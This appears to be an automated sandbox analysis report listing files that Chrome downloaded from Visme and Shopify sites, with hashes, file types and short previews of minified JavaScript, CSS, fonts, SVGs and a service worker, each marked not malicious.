                                                                    Preview:import{b as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=d(m()),c={xs:["h-xs","4 / 8"],sm:["h-sm","8 / 16"],md:["h-md","16 / 24"],lg:["h-lg","24 / 32"],xl:["h-xl","32 / 40"],"2xl":["h-2xl","40 / 64"],"3xl":["h-3xl","64 / 80"],"4xl":["h-4xl","80 / 128"],"5xl":["h-5xl","160 / 128"]},o={4:["h-1","md:h-1"],8:["h-2","md:h-2"],16:["h-4","md:h-4"],24:["h-6","md:h-6"],32:["h-8","md:h-8"],40:["h-10","md:h-10"],64:["h-16","md:h-16"],80:["h-20","md:h-20"],128:["h-32","md:h-32"],320:["h-80","md:h-80"]},v=Object.keys(c),C=Object.keys(o);function y({className:a,size:h="md",mobile:e,desktop:s,devMode:i=!1}){let x="bg-lime-10 border border-lime-30 text-lime-70",p="flex relative overflow-hidden items-center justify-center overflow-hidden
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:downloaded
                                                                    Size (bytes):236547
                                                                    Entropy (8bit):5.058503635682863
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C31BE1A0B58421F626057CB89606639A
                                                                    SHA1:742E5BF6C46CC490B6F3A0E3A2253B2FD65B1350
                                                                    SHA-256:340C5EC329679393521649DA4C05364179DB01C48BAA1C791ADB392512804DE4
                                                                    SHA-512:F00F14176EA262E10F297CFB31F9394120AEA4B51BC2C42FE9659CD43F0D4BAEA578459BD7367289C923C76D62E318BE70CEB9A6C21583CD8C338573E803EE90
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://my.visme.co/ajax/gettranslation/en?1
                                                                    Preview:{"(You can select and add multiple questions)":"(You can select and add multiple questions)","0 Credit left":"0 Credit left","1_click_on_b_share_b_button_36492":"1. Click on \u003cb\u003eShare\u003c/b\u003e button","1_time_35652":"1 time","2_change_link_to_b_apos_anyone_w_36493":"2. Change link to \u003cb\u003e\u0026apos;Anyone with link\u0026apos;\u003c/b\u003e in Get Link box","360. and VR":"360. and VR","37288":"No, only on this slide","37387":"No, only for one placeholder","37590":"Edit Page Number","3D":"3D","3_copy_the_link_url_36190":"3. Copy the link (URL)","3d_animations_36758":"3d Animations","3d_graphics_36756":"3d Graphics","5_mb_36110":"5 MB","90_of_businesses_consider_it_cru_36194":"90% of businesses consider it crucial to have content reflect their brand","\u003c 1 minute ago":"\u003c 1 minute ago","\u003cbold\u003e{{value}}\u003c/bold\u003e / {{valueTotal}} credits left":"\u003cbold\u003e{{value}}\u003c/bold\u003e / {{valueTotal}} credits left","\u003cbold\u003e{{valu
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):449578
                                                                    Entropy (8bit):5.628031813022116
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:414B06B8603E97B90D7196076C19B9CB
                                                                    SHA1:AE9A58F79FBCE41BABA4C06605AC2DD55EB51CB6
                                                                    SHA-256:A651F026382118133EF9F76A3066EF4640BB695917538A763236BE2948C689FB
                                                                    SHA-512:5C8FFB790E73A88F1F6A01C5AB22CEB839CB1E2A03ED1504FAADFFF9A8C5FEA1923E4C590F289317A54949CBCC1BB58B8AF1D0E8D6D96D5A03BE01D8A1967FB6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://static-bundles.visme.co/static/css/player.0e9dc4b1a3e9fb508f82.bundle.css
                                                                    Preview:.beautyScrollbar--SOewT9d{height:100%;overflow:overlay;border-color:#f0f0f0}.quantum--nxGASqC{scrollbar-width:thin;overflow:auto}@-moz-document url-prefix(""){.quantum--nxGASqC{scrollbar-color:#999 transparent}}@-moz-document url-prefix(""){.quantum--nxGASqC.hiddenScrollbar--s0eQSjo,.quantum--nxGASqC.autoHide--wjTGPis{scrollbar-color:transparent transparent}}@-moz-document url-prefix(""){.quantum--nxGASqC.autoHide--wjTGPis:hover{scrollbar-color:#999 transparent}}.chromium--ScjTs4D.desktopChromium--nRKsEpl.hiddenScrollbar--s0eQSjo,.chromium--ScjTs4D.desktopChromium--nRKsEpl.autoHide--wjTGPis{border-color:transparent;transition:border-color .3s}.chromium--ScjTs4D.desktopChromium--nRKsEpl.autoHide--wjTGPis:hover{border-color:#f0f0f0}.chromium--ScjTs4D.desktopChromium--nRKsEpl.beautyScrollbar--SOewT9d::-webkit-scrollbar-thumb{border-radius:4px;border-style:inset outset outset inset;border-width:8px;border-color:inherit}.chromium--ScjTs4D.desktopChromium--nRKsEpl.beautyScrollbar--SOewT9d::-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (722)
                                                                    Category:downloaded
                                                                    Size (bytes):723
                                                                    Entropy (8bit):5.204466195864082
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C4136BC393340185A62716ED61ECD5BA
                                                                    SHA1:69E1432E8DEE147514197DFAB3A54C7CF1C87473
                                                                    SHA-256:35BC667D570CB69208EA741942DE94E34577A3DD79AE433BD6881235C70695C4
                                                                    SHA-512:40A5859E6947EF52B187E9B7536F6AA7F96F563C4BAB9BD0D80A15AFAF39FEB2008BB3FF1591E823B234E7883DD3758965CFF5C47B1D869A136471BCAC2673F6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TSB5B3F2.js
                                                                    Preview:import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var i=s(p()),c={};function l(t,o){let a=c[t];if(a)return a;let r=new Promise((n,d)=>{let e=document.createElement("script");o?.module&&(e.type="module"),e.src=t,e.onload=()=>{n(!0)},e.onerror=()=>{d(!1)},o?.in==="head"?document.head.appendChild(e):document.body.appendChild(e)});return c[t]=r,r}function S(t,o){let[a,r]=(0,i.useState)("loading"),n=JSON.stringify(o);return(0,i.useEffect)(()=>{async function d(){try{r("loading"),await l(t,o),r("done")}catch{r("error")}}d()},[t,n,o]),a}export{l as a,S as b};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (922)
                                                                    Category:downloaded
                                                                    Size (bytes):923
                                                                    Entropy (8bit):5.206672641508016
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:86AC8DA59D29B6D7882F814BA3CC7FC2
                                                                    SHA1:EBFD588A89275EC338F380ACEBB765413A315836
                                                                    SHA-256:E50C7F8DFFAB38E09C643B48AF1F51C6B3D4C57082C93364D0BB1B7A20E84424
                                                                    SHA-512:F62C1EBFF179CA5CD9EE8BEF0E4AD3601B8C3673D68ADFB3481C7E272090FE429734E98B2CFE73DEACA3BAE10082676543A98AFA96DD16D15767125F88D0E417
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VP62MOSM.js
                                                                    Preview:import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-E3EEA6W3.js";import{T as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";function u(){let{site:r}=y();return r.currencyCode||"USD"}function S(){let r=s(),n=u();return(o=0,t={})=>a(r,n,o,t)}var a=(r="en-US",n="USD",o=0,t={})=>new Intl.NumberFormat(r,{style:"currency",currencyDisplay:"narrowSymbol",currency:n,...t}).format(o),b=(r="en-US",n="USD",o=0)=>{let t=new Intl.NumberFormat(r,{style:"currency",currencyDisplay:"narrowSymbol",currency:n}).formatToParts(o),l=t.filter(e=>e.type==="integer"||e.type==="group").reduce((e,c)=>e+c.value,"");return t?.filter(e=>e.type!=="integer"&&e.type!=="group").reduce((e,c)=>({...e,integer:l,[c.type==="currency"?"currencySymbol":c.type]:c.value}),{})},C=()=>{let r=s(),n=u();return(o,t)=>a(r,n,o,t||{})};export{S as a,a as b,b as c,C as d};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (9376)
                                                                    Category:downloaded
                                                                    Size (bytes):9377
                                                                    Entropy (8bit):5.247662130836897
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D09DA63EF7F3D0804E8556C09D2784E0
                                                                    SHA1:4BFDF60123DA737D1A0084830E206A9223650AEA
                                                                    SHA-256:135BED02ECDC5A7BF381767CDAD2F0663A4E03F57766BC23E09C35B9AFED273B
                                                                    SHA-512:F2F2E789991082194510F3AB62341A60EA210F7C49349A163237600F888D99F54900A5FDBF1267612B96FAF900AA35AC0D90C4FCEFA88B71CECE6FF905FF380F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-4JBVNCIW.js
                                                                    Preview:var b="https://cdn.shopify.com/b/shopify-brochure2-assets/1d6091ce14b313a3c9a19f237df898bb.svgz",n="https://cdn.shopify.com/b/shopify-brochure2-assets/c99f9bb49ec7dec96678765339586edc.svgz",d="https://cdn.shopify.com/b/shopify-brochure2-assets/68388f12ce9faef230ada91e20f69cc2.svgz",r="https://cdn.shopify.com/b/shopify-brochure2-assets/04f205245f06d35f87b53d2ee1ba5969.svgz",l="https://cdn.shopify.com/b/shopify-brochure2-assets/d8428f5c0d6ecc96260b1eafaf173341.svgz",i="https://cdn.shopify.com/b/shopify-brochure2-assets/40a70b395afc3c391953470089e1f58a.svgz",g="https://cdn.shopify.com/b/shopify-brochure2-assets/29a20784f322b566e3f71ebb2bf9d6bb.svgz",y="https://cdn.shopify.com/b/shopify-brochure2-assets/cf32724c718f09d23eef5489f79bf6b9.svgz",m="https://cdn.shopify.com/b/shopify-brochure2-assets/cd55dad309f3f66eb1b1fd5d6642e0f5.svgz",u="https://cdn.shopify.com/b/shopify-brochure2-assets/b450e474f3bfd464cfe5b6fcd8898c0b.svgz",v="https://cdn.shopify.com/b/shopify-brochure2-assets/6ba4ddb8ff7a
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2564)
                                                                    Category:downloaded
                                                                    Size (bytes):2565
                                                                    Entropy (8bit):5.326353779875704
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FF393789F0DBD82663C612A9DC418655
                                                                    SHA1:01BB2C6E3FA643FE6C5CC7F1C771D3A3C0874D89
                                                                    SHA-256:6210710F9BE18D9481E9DA433D9EDD3141D84EF2C0D03D5E62FA3162502379F6
                                                                    SHA-512:978E81CE81F1B88857AA35F0AF8465ED27B3DD9FDAEEE51325DA101CFF25828DC26D104C1C75E9EBF7C3672ACC777BAA9B232EB388BD8B6D1E86DFB688902203
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js
                                                                    Preview:import{a as h}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2CMHK44O.js";import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GF3AKGJL.js";import{b as x}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{b as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var k=d(g()),M=s("inline-block text-xs uppercase font-bold px-2 py-1 rounded align-top",{variants:{mode:{light:"bg-badge-light text-white",dark:"bg-badge-dark text-black"}}});function P({className:r,children:y,mode:e="light",as:n="p"}){let p="badge";return
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 117072, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):117072
                                                                    Entropy (8bit):7.9980508347997965
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:0E7F242E7413C80A7732C86C4C26624B
                                                                    SHA1:2E3138C908DE917034FC0DBB0464B540DEBB4F16
                                                                    SHA-256:FC031BA0BF935A6E4F1E392C51159E568B5C958C55F20866FF8AE452E2E1D2BE
                                                                    SHA-512:974AE71ECE802145F340BBC3103DBA2BEFEAE9DB82DC60A005D746FA2AC47052AA957F6E50B7FAB49EB5A68DD36B308A345AEDCB70409A25F26EB26EF216A9B7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/fonts/arial.woff2
                                                                    Preview:wOF2.......P.......`.................................V......V.6.....^..0..0.....$.....D....h.6.$..:..`. .._.....}[.........&..i.`....s.m...So..:.....a'xfV..=.8V.....a............_.LbL/.......T.U...v.:A...S.`...H.J..r.uL. .....b...[..a.`...j90.N.O...4.........R..N?..X...(.%..3.B...\..9e..-Z...3...b..I|.2?.VWX.I.R.<.H..'w..|v.V.v.S.......B*...GH..2.UR%..*.0l.X..Y.\B.-E...k:U.7....x..Q........j....W...>. .....Z;L....}R8a HAA.M..4.....<%qS.....e*........".n.-G.).f....w........R.%.)6{..b|....`J..)..w.L;.k.a..+..S....h.,.Y...")I.............{.d.\>..q...f..I..D.[..&eY[.s..". ..,.....e.u.1.......,c.w\...5 .~..G..QFDy..A.X&.$...j.J.O.u..R.[.v!...A......~..w..`b........by......(.~.]:^&[....1...K.Q.A.l.ljQ..()M.5..x.!.=...[.......6b...X.,.....W.U.E)...@.].`......V=d.@....!.f#.....K...B...^..2....0i.V.....~....I..i:..9..QI..-0......n.e.#.x"..?}....N.....YH..........R..`..`.Kj.2Y.Q..].)..(.......XqFc..^.z.......%CA.T.J.(-YRu.N.D..D...S?u...H. (.X..*../.?x
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (547)
                                                                    Category:downloaded
                                                                    Size (bytes):548
                                                                    Entropy (8bit):5.297555670881929
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E42F3641F1917DEB240D73F3EB49BFB4
                                                                    SHA1:A11DCB596309FA90758ED6926C731BD5F44137EB
                                                                    SHA-256:99B6FC4BDD4872DA3B3D002382955C9D7A112BCCC7D8867802C8F9FBD8DCAA3E
                                                                    SHA-512:E1EF4F64CC7CE107B63FB17E3F162E4334999BE21A728CF1AAE4E4C00E1E020E1BC131180220836CEEE85F557A6B8AD65381A2220D0D6F7811EA084F1D0B68D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EENCBVFR.js
                                                                    Preview:import{a as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var s;function l(o=10){let t=0,r=0,u=0,a=-1;function f(e){t||(t=e),r++,e-t>=1e3&&(t=e,u+=r,r=0),a=requestAnimationFrame(f)}return a=requestAnimationFrame(f),new Promise(e=>{setTimeout(()=>{s=u/(o-1),e(u/(o-1)),cancelAnimationFrame(a)},o*1e3)})}var n=i(c()),m=typeof window>"u"?n.useEffect:n.useLayoutEffect,F=m;export{l as a,F as b};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (6958)
                                                                    Category:downloaded
                                                                    Size (bytes):7011
                                                                    Entropy (8bit):5.048843760314333
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E8D46109A6255EC4332776D715BB86D9
                                                                    SHA1:1F319A7CDC9692D5DCDF2BBFAC553A2E202D97EC
                                                                    SHA-256:974BDBA5E4FDF41E78B6F3C1530CA4E778FA8D9E1EB94D45FDBB083E9A2801F3
                                                                    SHA-512:8AFE638F70285BC591A07D9484A4ADFF06FBAB537898EDA6416D9F4C913F143B962E71FB3972476ADC97460AB45D32AF1DAA8AD26B6211F94F2AB84A1D3BC558
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-strategies.prod.js
                                                                    Preview:this.workbox=this.workbox||{},this.workbox.strategies=function(t,e,s,r,n,i,a,o,c){"use strict";function h(){return(h=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var s=arguments[e];for(var r in s)Object.prototype.hasOwnProperty.call(s,r)&&(t[r]=s[r])}return t}).apply(this,arguments)}try{self["workbox:strategies:6.2.0"]&&_()}catch(t){}function l(t){return"string"==typeof t?new Request(t):t}class u{constructor(t,e){this.yt={},Object.assign(this,e),this.event=e.event,this.rt=t,this.vt=new n.Deferred,this.qt=[],this.bt=[...t.plugins],this.gt=new Map;for(const t of this.bt)this.gt.set(t,{});this.event.waitUntil(this.vt.promise)}async fetch(t){const{event:s}=this;let r=l(t);if("navigate"===r.mode&&s instanceof FetchEvent&&s.preloadResponse){const t=await s.preloadResponse;if(t)return t}const n=this.hasCallback("fetchDidFail")?r.clone():null;try{for(const t of this.iterateCallbacks("requestWillFetch"))r=await t({request:r.clone(),event:s})}catch(t){if(t instanceof Error)thro
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (14140)
                                                                    Category:downloaded
                                                                    Size (bytes):14141
                                                                    Entropy (8bit):5.526660598966549
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3864E0CCBC529B447D6F2480AE4928C0
                                                                    SHA1:BAA5D32179AACDA5FC6754B37B297FD7682DCB76
                                                                    SHA-256:35676625B98C1FEF0F0ADC149C120409C264221A4A2B88672D27BFC2FCFE09E2
                                                                    SHA-512:16E6E3480E1A60805BF6007A8A8E03E02C244297831E497EB4C70551E688B195177A3762CBA1EF7BF4B1A8005F53BEBD93FAB3958969581E4D0DBA9F9DE5AB5B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-7DGIB4XT.js
                                                                    Preview:import{a as vt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-GEUHE6KC.js";import{a as I,d as q}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LEHU3LRW.js";import{b as L}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TSB5B3F2.js";import{f as U,h as yt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TJ5CAOJ6.js";import{d as ht,e as G,n as ft,s as xt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TBYT574J.js";import{f as bt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{T as f,X as _,ba as j,h as Ot}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as h,d as gt,e as B,f as mt,g as k,l as P,o as wt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{q as st,r as ct,s as lt,t as
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):5392
                                                                    Entropy (8bit):4.342551207882154
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D8428F5C0D6ECC96260B1EAFAF173341
                                                                    SHA1:8065FB01CEAD2025BB486DAB01721ADB17DB1C15
                                                                    SHA-256:27184CB3B4967DD6702691916D015A4418CFB1C87F045074D2C2A9939139446C
                                                                    SHA-512:16CAEA04D2B164B8F991F5405B53A40BC9B4A98E935EF4404B538AAEB5061BE5597CA45324D4A865CDABE79F73ADA7334FA813D02138D3706AD291F2234BF4E8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/d8428f5c0d6ecc96260b1eafaf173341.svgz
                                                                    Preview:<svg width="148" height="65" viewBox="0 0 148 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="146" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7325)">.<path d="M62.3412 35.6218C62.3412 37.7344 62.6527 40.8288 60.7274 40.8707C58.8356 40.9316 58.994 37.6514 59.0344 35.4786C59.0732 33.4482 58.8943 30.4978 60.7274 30.4765C62.4006 30.4559 62.342 33.5518 62.342 35.6218H62.3412ZM66.9823 35.5403C66.9009 32.1764 63.8697 29.7172 60.7868 29.7172C57.4998 29.7172 54.493 32.1573 54.394 35.5403C54.3125 39.0253 57.4 41.7724 60.8066 41.7305C63.8355 41.6909 67.0616 39.2302 66.9816 35.5403H66.9823ZM48.6859 35.6218C48.6859 37.7344 49.005 40.8288 47.0714 40.8707C45.1796 40.9316 45.3403 37.6514 45.3806 35.4786C45.4187 33.4482 45.2405 30.4978 47.0714 30.4765C48.7446 30.4559 48.6859 33.5518 48.6859 35.6218ZM53.3263 35.5403C53.2471 32.1764 50.2137 29.7172 47.1323 29.7172C43.846 29.7172 40.8377 32.1573 40.738 35.5403C40.6588 39.0253 43.7463 41.7724 47.1528 41.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1286)
                                                                    Category:downloaded
                                                                    Size (bytes):1287
                                                                    Entropy (8bit):5.333429620178208
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DB4DAD5D7BB2EC7B34B5F7E2DCFF2F64
                                                                    SHA1:A396843BE2396E334BE9EF73DE61B9BE30E7230F
                                                                    SHA-256:8C768D86357A505AE38928A2CD27B10D4A074C5AA32B5E1A678BD6C0E2C5C351
                                                                    SHA-512:E5E9CDD0BF1889E34275438FACA483A0A5AB399AD6B583878D27CD51D9C1204E9B488F8C70C312E00FF5E3FE108226A163511CD4F0A5B5A65C6D8BDFB2BE96DC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-KZHICCPI.js
                                                                    Preview:import{d as U}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{i as f,j as s,k as l,l as P}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{b as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as A}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var T=w(A());function S(r,a,e){for(let o of r){let n=e.get(o);n&&a.set(o,n)}}function k(r=s){let a={...s,...r},{url:e=f,email:o,pageViewToken:n}=a,i=new URL(e),t=i.searchParams;if(typeof window>"u")return i;let p=new URL(window.location.href).searchParams,m=u("_shopify_y");m&&t.set("_y",m);let c=u("_shopify_s");c&&t.set("_s",c),n&&t.set("_p",n);let g=new URL(t.get("signup_page")||window.location.href);if(S(l,g.searchParams,p),t.set("signup_
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):685477
                                                                    Entropy (8bit):5.01674812816324
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CE900FA7EDEF2E69AF0E800176A36232
                                                                    SHA1:60CB2057ED72A04864FE039AD9E9544550F15D82
                                                                    SHA-256:1E7464727D17423E8765C434F99F2D485A5FDD86E47B83D6198C973D4290125A
                                                                    SHA-512:1A0812686F11436D82A2798EDA42C125F22CA41532925E39CFE5049F607CE7C6C4DFE77C862B3979A385CA4D84BEA5EC83B37D8F454E03051D0668B0A4E7DC0A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js
                                                                    Preview:import{a as D,e as es}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{b as Ve,d as Ea,o as Qe,t as Je}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js";import{a as pe}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as k}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{c as j,e as _}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var as=j((ln,ss)=>{ss.exports={area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0}});var vs=j((_r,ys)=>{"use strict";ys.exports=e=>encodeURIComponent(e).replace(/[!'()*]/g,s=>`%${s.charCodeAt(0).toString(16).toUpperCase()}`)});var xs=j((Ar,Ls)=>{"use strict";var As="%[a-f0-9]{2}",Ps=new RegExp("("+As+")|([^%]+?)","gi"),_s=new RegExp("("+As+")+","gi");function Te
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (729), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):729
                                                                    Entropy (8bit):5.052432429354922
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:70E6DD41E23235328354B016142FD45E
                                                                    SHA1:8A0703290A3DE3A6955D47847C6BAD4C9B11E729
                                                                    SHA-256:26C8DEE2E495E6AEF391A6915834A388D52E4BA63EEABDEC5517320A237D5795
                                                                    SHA-512:C86EB54BD2EB12F06B0EFBC1AF1E6308FDDE5A427E8BC41FCC9FDA5B291737A8EC525DDF7F2D1D949F65BC08310DA305BCAC843B4E0E68F205007E3C831909E8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://my.visme.co/serviceWorker.js
                                                                    Preview:self.importScripts("https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-sw.js");let ThreeDAnimationsCacheName="3d_animations";self.addEventListener("install",e=>{caches.delete(ThreeDAnimationsCacheName),e.waitUntil(self.skipWaiting())}),self.addEventListener("message",e=>{e.data?.blob&&e.data.source&&caches.open(ThreeDAnimationsCacheName).then(s=>{s.put(new Request(e.data.source),new Response(e.data.blob)),clients.get(e.source.id).then(s=>s.postMessage({source:e.data.source}))})}),workbox.setConfig({debug:!1}),workbox.core.clientsClaim(),workbox.routing.registerRoute(/__video__/,new workbox.strategies.CacheOnly({cacheName:ThreeDAnimationsCacheName,plugins:[new workbox.rangeRequests.RangeRequestsPlugin]}));
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (742)
                                                                    Category:downloaded
                                                                    Size (bytes):743
                                                                    Entropy (8bit):5.2321455476234835
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2A3E70F88CF763D68470811C6621DE19
                                                                    SHA1:C69B13C13F414126A36D90FDFD74DCB961EC1026
                                                                    SHA-256:E08032691E1A2E3A576CB67BBC3F87F862A51C8E10D9007E3A695383AFEC78A5
                                                                    SHA-512:6341BE846A4E23F89E97A89451430A23479B1DEA1FF7315C92F9A3B2C7F069CBDC6535D464960DCC60A57A6C3CD7C26AF34F6AD19D55DA988CAB7D212F7A410F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ET5ULIQ4.js
                                                                    Preview:import{a as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VQZZYY2U.js";import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-73E4MQIO.js";import{e as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NQDYGCFV.js";import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=r(o());function d({direction:m,disabled:u=!1,...e}){return(0,t.jsx)(n,{disabled:u,icon:m==="left"?(0,t.jsx)(i,{}):(0,t.jsx)(a,{}),variant:"primary",tabIndex:e["aria-hidden"]?-1:void 0,...e})}export{d as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):4229
                                                                    Entropy (8bit):4.444630240150709
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:417301E08872B3BB26B3EB9F66A1BE15
                                                                    SHA1:F37158BC6F989D08DBE5F6101C92DF8B44298B45
                                                                    SHA-256:994316712187253BB35F17B7297B75651CB6F8C42C21FFC37A4A24EA0EB97F6B
